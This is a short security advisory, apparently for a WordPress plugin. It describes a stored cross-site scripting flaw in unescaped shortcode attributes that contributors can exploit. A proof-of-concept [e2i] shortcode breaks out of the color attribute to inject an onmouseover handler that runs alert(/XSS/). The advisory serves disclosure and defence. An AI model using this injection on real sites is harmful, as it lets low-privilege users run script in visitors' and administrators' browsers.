Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
Add the following payload to a post:
```
[e2i color='red" onmouseover="alert(/XSS/)"' size="3" bgcolor="0044AA" trans="NO"] text [/e2i]
```